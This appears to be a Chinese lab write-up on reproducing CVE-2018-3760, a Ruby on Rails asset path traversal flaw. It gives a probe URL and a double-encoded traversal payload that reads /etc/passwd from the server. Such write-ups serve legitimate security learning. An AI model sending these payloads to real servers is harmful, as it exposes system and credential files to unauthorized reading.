墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
Java成神之路-1 分钟前
DNS 与 CDN 底层原理深度剖析:从域名解析到内容分发全链路解析
网络·网络协议·tcp/ip
用户908324602735 分钟前
Spring AI + RAG + SSE 实现带搜索来源的智能问答完整方案
前端·后端
Java编程爱好者8 分钟前
Java面试题及答案整理(2026年牛客网最新版)
后端
_杨瀚博8 分钟前
JAVA找出哪个类import了不存在的类
java·后端
Java编程爱好者10 分钟前
接口越跑越慢?保姆级 MySQL 慢 SQL 优化教程,照着做速度立刻起飞
后端
AI浩32 分钟前
UCAN:用于轻量级超分辨率中扩展感受野的统一卷积注意力网络
网络
SmartBrain1 小时前
Spring Boot的高性能技术栈的工程实践
spring boot·后端·架构
echome8881 小时前
Python 异步编程实战:asyncio 核心概念与最佳实践
开发语言·网络·python
剑海风云1 小时前
JDK 26之安全增强
java·开发语言·安全·jdk26